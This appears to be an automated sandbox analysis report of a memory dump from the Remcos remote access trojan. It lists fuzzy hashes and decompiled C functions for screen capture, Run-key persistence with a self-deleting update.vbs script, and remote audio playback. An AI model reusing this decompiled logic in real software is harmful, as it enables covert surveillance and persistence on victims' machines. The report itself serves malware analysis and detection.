                      • Instruction Fuzzy Hash: F022F371A012199BDF15CF68C8907EEB7B1EF44314F18416BEC55AB382DB389E81CB99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
                      • Instruction ID: 2ff722b402dd1cb968047811478b8eaada24175be06acbaae8cb73f1bee3a1e2
                      • Opcode Fuzzy Hash: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
                      • Instruction Fuzzy Hash: 3E02C1716005519FD318CF2EEC9153AB7E1EF8E301748853AE486C7395EB74EA22DB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction ID: 2e3b19bf7ee36a531d95d42fa299a25bd2e154ed583d8d0915d7b163c9cd7bd2
                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction Fuzzy Hash: C8C1B63220509349DF2D463984340BFBAA19ED67B5B1A276FD4B3CF2D4EF28E924D524
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction ID: 478658756e30f7f1ba970a92bd0e41a0f1cb0e3296731c86c1f7c4ea0a9e4636
                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction Fuzzy Hash: F6C1B43220609349DF2D4639C4741BFBAA19ED67B1B1A275ED4B2CF2C4EF18E924D624
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction ID: 89fb698572b7cf86533d0eea82b05fcf403d339a8e9ac14319646ffa1aaa429a
                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction Fuzzy Hash: 67C1D8322060534ADF2D463984341BFBAA09EE57B1B1A276FD4B3CF2C4EF18E964D524
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 87fbe7bf7bf54041e8de41a6fd51e618a094b94f8abcd9874f2157c003b73034
                      • Instruction ID: b026397cdc5a2788a8846e4ec5f60ec3cbb44c94b97407c66bc8dff9a88f8d49
                      • Opcode Fuzzy Hash: 87fbe7bf7bf54041e8de41a6fd51e618a094b94f8abcd9874f2157c003b73034
                      • Instruction Fuzzy Hash: F6B18179524A929AC701AF29C0A13F17BA1FF6A304F1850B9DC98CFB57E3295412EB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                      • Instruction ID: b367387755e38c2acd2464c16e73056793f51d4de4b8bca9bcadcc32440fe761
                      • Opcode Fuzzy Hash: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                      • Instruction Fuzzy Hash: 84615B7120070A77DE389A2888927BFE3949B6D304F14391FF942DB781EE1DDD42825E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                      • Instruction ID: 6a2ad8edffecebfcaae903e9719156c7a0c76254d9b187d9e67c469d6c3393be
                      • Opcode Fuzzy Hash: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                      • Instruction Fuzzy Hash: CB613C31E0021AABDF08DFB9D5815EFB7B2FF8C304F50812AE425BB250DA746A058B94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                      • Instruction ID: 7a46c63e6297807c5de7f1130092129a1d39734970edeb025e6968c5830d1d5b
                      • Opcode Fuzzy Hash: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                      • Instruction Fuzzy Hash: 8F315A75A00115AFCB20CF59CD81B5AB7A9FF48354F1580B6ED04AB382D375EA64CB98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: f68e5f41fa18727e6a735129a3979a796d7c5d5db83d10118ba36f39fff963d2
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: F2113D7724018143D61486BEC9B95B7A3D5EBCE321F2D637BD0424B778D32AD945950C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 70bc07612a7e46317a0bd45a797e311314827f706bb13391612c18c1031be34f
                      • Instruction ID: 04bb12d9fe25f189a3e8844143b49d6f0c0574ad185b56a32ec544f6d92150a4
                      • Opcode Fuzzy Hash: 70bc07612a7e46317a0bd45a797e311314827f706bb13391612c18c1031be34f
                      • Instruction Fuzzy Hash: 0611E4B2E00228AFDB14DF69EC806EEB7F8EF84314F41416AE815E3140EB745E95CA80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E00414906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
                      				void* _v12;
                      				char _v13;
                      				struct HDC__* _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				int _v32;
                      				int _v36;
                      				struct HDC__* _v40;
                      				void* _v46;
                      				intOrPtr _v50;
                      				intOrPtr _v54;
                      				char _v56;
                      				char _v80;
                      				intOrPtr _v84;
                      				struct tagCURSORINFO _v100;
                      				signed int _v106;
                      				signed int _v108;
                      				long _v116;
                      				long _v120;
                      				char _v124;
                      				struct _ICONINFO _v144;
                      				char _v168;
                      				void* __ebx;
                      				int _t114;
                      				void* _t115;
                      				void* _t116;
                      				void* _t120;
                      				int _t127;
                      				void* _t128;
                      				signed char _t140;
                      				long _t146;
                      				void* _t147;
                      				int _t149;
                      				void* _t157;
                      				void* _t186;
                      				void* _t188;
                      				void* _t194;
                      				int _t199;
                      				void* _t204;
                      				void* _t223;
                      				signed int _t226;
                      				struct HDC__* _t228;
                      				struct HDC__* _t232;
                      				struct tagBITMAPINFO* _t234;
                      				void* _t235;
                      				int _t241;
                      
                      				_v13 = __edx;
                      				_t194 = __ecx;
                      				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                      				_v20 = _t232;
                      				_t228 = CreateCompatibleDC(_t232);
                      				_v40 = _t228;
                      				_v32 = L00414D3D( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                      				_t114 = L00414D89( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                      				_t199 = _v32;
                      				_v36 = _t114;
                      				if(_t199 != 0 || _t114 != 0) {
                      					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
                      					_v12 = _t115;
                      					__eflags = _t115;
                      					if(_t115 != 0) {
                      						_t116 = SelectObject(_t228, _t115);
                      						__eflags = _t116;
                      						if(_t116 != 0) {
                      							_v28 = _v28 & 0x00000000;
                      							_v24 = _v24 & 0x00000000;
                      							L00414DCA( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
                      							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
                      							__eflags = _t120;
                      							if(_t120 == 0) {
                      								goto L7;
                      							}
                      							__eflags = _v13;
                      							if(_v13 != 0) {
                      								_v100.cbSize = 0x14;
                      								_t186 = GetCursorInfo( &_v100);
                      								__eflags = _t186;
                      								if(_t186 != 0) {
                      									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
                      									__eflags = _t188;
                      									if(_t188 != 0) {
                      										_t241 = _v84 - _v144.yHotspot - _v24;
                      										__eflags = _t241;
                      										DeleteObject(_v144.hbmColor);
                      										DeleteObject(_v144.hbmMask);
                      										_t228 = _v40;
                      										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
                      										_t232 = _v20;
                      									}
                      								}
                      							}
                      							_push( &_v124);
                      							_t127 = 0x18;
                      							_t128 = GetObjectA(_v12, _t127, ??);
                      							__eflags = _t128;
                      							if(_t128 == 0) {
                      								goto L7;
                      							} else {
                      								_t226 = _v106 * _v108 & 0x0000ffff;
                      								__eflags = _t226 - 1;
                      								if(_t226 != 1) {
                      									_push(4);
                      									_pop(1);
                      									_a4 = 1;
                      									__eflags = _t226 - 1;
                      									if(_t226 <= 1) {
                      										L24:
                      										__eflags = 1 << 1;
                      										_push(0x2eb6edc);
                      										L25:
                      										_t234 = LocalAlloc(0x40, ??);
                      										_t204 = 0x18;
                      										_t234->bmiHeader = 0x28;
                      										_t234->bmiHeader.biWidth = _v120;
                      										_t234->bmiHeader.biHeight = _v116;
                      										_t234->bmiHeader.biPlanes = _v108;
                      										_t234->bmiHeader.biBitCount = _v106;
                      										_t140 = _a4;
                      										__eflags = _t140 - _t204;
                      										if(_t140 < _t204) {
                      											__eflags = 1;
                      											_t234->bmiHeader.biClrUsed = 1 << _t140;
                      										}
                      										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                      										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                      										asm("cdq");
                      										_t227 = _t226 & 0x00000007;
                      										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                      										_t234->bmiHeader.biSizeImage = _t146;
                      										_t147 = GlobalAlloc(0, _t146);
                      										_a4 = _t147;
                      										__eflags = _t147;
                      										if(_t147 != 0) {
                      											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
                      											__eflags = _t149;
                      											if(_t149 != 0) {
                      												_v56 = 0x4d42;
                      												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                      												_v50 = 0;
                      												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                      												__eflags = _t157;
                      												_v46 = _t157;
                      												E004020D5(_t194,  &_v80);
                      												E004020D5(_t194,  &_v168);
                      												E0040251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
                      												E00403436( &_v80);
                      												E0040251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
                      												E00403436( &_v80);
                      												_t235 = _a4;
                      												E0040251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                      												E00403436( &_v80);
                      												DeleteObject(_v12);
                      												GlobalFree(_t235);
                      												DeleteDC(_v20);
                      												DeleteDC(_t228);
                      												E00402044(_t194, _t194, __eflags,  &_v168);
                      												L00401FC7();
                      												L00401FC7();
                      												goto L32;
                      											}
                      											DeleteDC(_v20);
                      											DeleteDC(_t228);
                      											DeleteObject(_v12);
                      											GlobalFree(_a4);
                      											goto L2;
                      										} else {
                      											_push(_v20);
                      											L8:
                      											DeleteDC();
                      											DeleteDC(_t228);
                      											_push(_v12);
                      											goto L5;
                      										}
                      									}
                      									_push(8);
                      									_pop(1);
                      									_a4 = 1;
                      									__eflags = _t226 - 1;
                      									if(_t226 <= 1) {
                      										goto L24;
                      									}
                      									_push(0x10);
                      									_pop(1);
                      									_a4 = 1;
                      									__eflags = _t226 - 1;
                      									if(_t226 <= 1) {
                      										goto L24;
                      									}
                      									_t223 = 0x18;
                      									__eflags = _t226 - _t223;
                      									if(_t226 > _t223) {
                      										_push(0x20);
                      										_pop(1);
                      										L23:
                      										_a4 = 1;
                      										goto L24;
                      									}
                      									_a4 = _t223;
                      									_push(0x28);
                      									goto L25;
                      								}
                      								goto L23;
                      							}
                      						}
                      						L7:
                      						_push(_t232);
                      						goto L8;
                      					} else {
                      						DeleteDC(_t232);
                      						DeleteDC(_t228);
                      						_push(0);
                      						L5:
                      						DeleteObject();
                      						goto L2;
                      					}
                      				} else {
                      					L2:
                      					E00402084(_t194, _t194, 0x45f6bc);
                      					L32:
                      					return _t194;
                      				}
                      			}

                      APIs
                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                      • CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                        • Part of subcall function 00414D3D: GetMonitorInfoW.USER32(?,?), ref: 00414D5D
                        • Part of subcall function 00414D89: GetMonitorInfoW.USER32(?,?), ref: 00414DA9
                      • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041497B
                      • DeleteDC.GDI32(00000000), ref: 0041498F
                      • DeleteDC.GDI32(00000000), ref: 00414992
                      • DeleteObject.GDI32(?), ref: 00414996
                      • SelectObject.GDI32(00000000,00000000), ref: 004149A0
                      • DeleteDC.GDI32(00000000), ref: 004149B1
                      • DeleteDC.GDI32(00000000), ref: 004149B4
                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004149F0
                      • GetCursorInfo.USER32(?,?,?), ref: 00414A0B
                      • GetIconInfo.USER32(?,?), ref: 00414A1F
                      • DeleteObject.GDI32(?), ref: 00414A44
                      • DeleteObject.GDI32(?), ref: 00414A4D
                      • DrawIcon.USER32 ref: 00414A5C
                      • GetObjectA.GDI32(?,00000018,?), ref: 00414A70
                      • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414AD6
                      • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00414B3F
                      • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414B63
                      • DeleteDC.GDI32(?), ref: 00414B76
                      • DeleteDC.GDI32(00000000), ref: 00414B79
                      • DeleteObject.GDI32(?), ref: 00414B7E
                      • GlobalFree.KERNEL32 ref: 00414B88
                      • DeleteObject.GDI32(?), ref: 00414C2D
                      • GlobalFree.KERNEL32 ref: 00414C34
                      • DeleteDC.GDI32(?), ref: 00414C43
                      • DeleteDC.GDI32(00000000), ref: 00414C46
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                      • String ID: DISPLAY
                      • API String ID: 517350757-865373369
                      • Opcode ID: 6ff8cbcc277d7720571f848809e7628165d438946616432f88157e7f1d5e0bb6
                      • Instruction ID: 04b928e990297c4dc387ef5bf1f87de0b325f6e157068eb4714aaf8e6101e2a9
                      • Opcode Fuzzy Hash: 6ff8cbcc277d7720571f848809e7628165d438946616432f88157e7f1d5e0bb6
                      • Instruction Fuzzy Hash: 1DB17171900319AFDB10DFA0DC45BEEBBB8EF44756F00402AF949E7290DB74AA45CB58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E0040B0E2(char _a4) {
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				char _v148;
                      				char _v172;
                      				short _v692;
                      				void* __ebx;
                      				void* __edi;
                      				void* __ebp;
                      				void* _t53;
                      				void* _t54;
                      				void* _t57;
                      				signed int _t61;
                      				void* _t62;
                      				void* _t78;
                      				void* _t79;
                      				void* _t92;
                      				void* _t93;
                      				signed char _t134;
                      				void* _t243;
                      				void* _t245;
                      				void* _t246;
                      				void* _t247;
                      
                      				E0041015B();
                      				if( *0x46a9d4 != 0x30) {
                      					L00409D73();
                      				}
                      				_t243 =  *0x46bd6b - 1; // 0x0
                      				if(_t243 == 0) {
                      					E0041537E(_t243);
                      				}
                      				if( *0x46ba75 != 0) {
                      					E00417754(L00401EEB(0x46c0e0));
                      				}
                      				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                      				_t245 =  *0x46bb02 - 1; // 0x1
                      				if(_t245 == 0) {
                      					L00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8));
                      				}
                      				_t246 =  *0x46bafb - 1; // 0x0
                      				if(_t246 == 0) {
                      					L00410D5C(0x80000002, _t231, L00401EEB(0x46c4e8));
                      				}
                      				_t247 =  *0x46bb00 - 1; // 0x0
                      				if(_t247 == 0) {
                      					L00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
                      				}
                      				_t53 = E00402489();
                      				_t54 = L00401F95(0x46c560);
                      				_t57 = E00410A30(L00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
                      				_t248 = _t57;
                      				if(_t57 == 0) {
                      					GetModuleFileNameW(0,  &_v692, 0x208);
                      				}
                      				RegDeleteKeyA(0x80000001, L00401F95(0x46c518));
                      				_t61 = SetFileAttributesW( &_v692, 0x80);
                      				_t140 = 0x46c530;
                      				asm("sbb bl, bl");
                      				_t134 =  ~_t61 & 0x00000001;
                      				_t62 = E004074E4(_t248);
                      				_t249 = _t62;
                      				if(_t62 != 0) {
                      					_t140 = 0x46c530;
                      					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
                      				}
                      				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, E0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
                      				L00401EF0();
                      				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                      				L00401EF0();
                      				_t250 = _t134;
                      				if(_t134 != 0) {
                      					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
                      					L00401EF0();
                      					L00401EF0();
                      					L00401EF0();
                      				}
                      				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
                      				L00401EF0();
                      				L00401EF0();
                      				L00401EF0();
                      				_t251 = _t134;
                      				if(_t134 != 0) {
                      					E0040766C(_t134,  &_v28, 0, L"wend\n");
                      				}
                      				_t78 = E004074E4(_t251);
                      				_t252 = _t78;
                      				if(_t78 != 0) {
                      					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
                      					L00401EF0();
                      					L00401EF0();
                      				}
                      				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
                      				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
                      				L00401EF0();
                      				L00401EF0();
                      				L00401EF0();
                      				L00401EF0();
                      				L00401EF0();
                      				E0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                      				_t92 = L00401EEB( &_v124);
                      				_t93 = E00402489();
                      				if(E00417947(L00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
                      					ExitProcess(0);
                      				}
                      				L00401EF0();
                      				L00401EF0();
                      				return L00401EF0();
                      			}

                      APIs
                        • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                        • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234
                        • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                        • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                        • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                        • Part of subcall function 00417947: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                      • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
                      • ExitProcess.KERNEL32 ref: 0040B463
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                      • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                      • API String ID: 1861856835-219127200
                      • Opcode ID: bb25c8fdeaa4f241debf8e6a0405e14f512fb9588bc743e7edfe07456e5c5e86
                      • Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
                      • Opcode Fuzzy Hash: bb25c8fdeaa4f241debf8e6a0405e14f512fb9588bc743e7edfe07456e5c5e86
                      • Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E004169CC(void* __ecx, void* __edx, char _a4) {
                      				char _v24;
                      				char _v28;
                      				char _v52;
                      				char _v76;
                      				char _v100;
                      				char _v124;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t25;
                      				void* _t28;
                      				void* _t43;
                      				void* _t60;
                      				void* _t63;
                      				void* _t67;
                      				CHAR* _t89;
                      				void* _t109;
                      				CHAR* _t110;
                      				void* _t111;
                      				void* _t114;
                      				void* _t118;
                      
                      				_t103 = __edx;
                      				_t67 = __ecx;
                      				_t109 = __edx;
                      				if(L00416C12( &_a4, __ecx, __ecx) == 0xffffffff) {
                      					_t63 = L00401EEB( &_a4);
                      					_t103 = 0x30;
                      					L00401EFA( &_a4, 0x30, _t111, E0041805B( &_v28, 0x30, _t63));
                      					L00401EF0();
                      				}
                      				_t25 = E00402489();
                      				_t120 = _t25;
                      				if(_t25 == 0) {
                      					__eflags = PathFileExistsW(L00401EEB( &_a4));
                      					if(__eflags != 0) {
                      						goto L4;
                      					} else {
                      						E00402084(_t67, _t114 - 0x18, 0x45f6bc);
                      						_push(0xa8);
                      						L00404AA4(_t67, 0x46ca18, _t103, __eflags);
                      					}
                      				} else {
                      					_t60 = L00401EEB( &_a4);
                      					_t118 = _t114 - 0x18;
                      					E004020EC(_t67, _t118, _t103, _t120, _t109);
                      					E00417A4E(_t60);
                      					_t114 = _t118 + 0x18;
                      					L4:
                      					_t28 = E004172DA( &_v124, _t67);
                      					_t108 = E00403030( &_v28, E004030A6(_t67,  &_v76, L00409E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
                      					E004030A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
                      					L00401EF0();
                      					L00401EF0();
                      					L00401EF0();
                      					L00401EF0();
                      					mciSendStringW(L00401EEB( &_v52), 0, 0, 0);
                      					mciSendStringA("play audio", 0, 0, 0);
                      					_t115 = _t114 - 0x18;
                      					E00402084(0, _t114 - 0x18, 0x45f6bc);
                      					_push(0xa9);
                      					L00404AA4(0, 0x46ca18, _t32, 0);
                      					_t43 = CreateEventA(0, 1, 0, 0);
                      					while(1) {
                      						L5:
                      						 *0x46bea8 = _t43;
                      						while(1) {
                      							_t122 = _t43;
                      							if(_t43 == 0) {
                      								break;
                      							}
                      							__eflags =  *0x46bea6; // 0x0
                      							if(__eflags != 0) {
                      								mciSendStringA("pause audio", 0, 0, 0);
                      								 *0x46bea6 = 0;
                      							}
                      							__eflags =  *0x46bea5; // 0x0
                      							if(__eflags != 0) {
                      								mciSendStringA("resume audio", 0, 0, 0);
                      								 *0x46bea5 = 0;
                      							}
                      							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
                      							_t108 =  &_v24;
                      							_t110 = "stopped";
                      							_t89 = 0;
                      							while(1) {
                      								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
                      								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
                      									break;
                      								}
                      								_t89 = _t89 + 1;
                      								__eflags = _t89 - 8;
                      								if(_t89 != 8) {
                      									continue;
                      								} else {
                      									SetEvent( *0x46bea8);
                      								}
                      								break;
                      							}
                      							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
                      							if(__eflags != 0) {
                      								_t43 =  *0x46bea8; // 0x0
                      							} else {
                      								CloseHandle( *0x46bea8);
                      								_t43 = 0;
                      								goto L5;
                      							}
                      						}
                      						mciSendStringA("stop audio", 0, 0, 0);
                      						mciSendStringA("close audio", 0, 0, 0);
                      						E00402084(0, _t115 - 0x18, 0x45f6bc);
                      						_push(0xaa);
                      						L00404AA4(0, 0x46ca18, _t108, _t122);
                      						L00401EF0();
                      						goto L21;
                      					}
                      				}
                      				L21:
                      				return L00401EF0();
                      			}

                      APIs
                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416AB1
                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416AC5
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 00416AEA
                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 00416B00
                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00416B41
                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00416B59
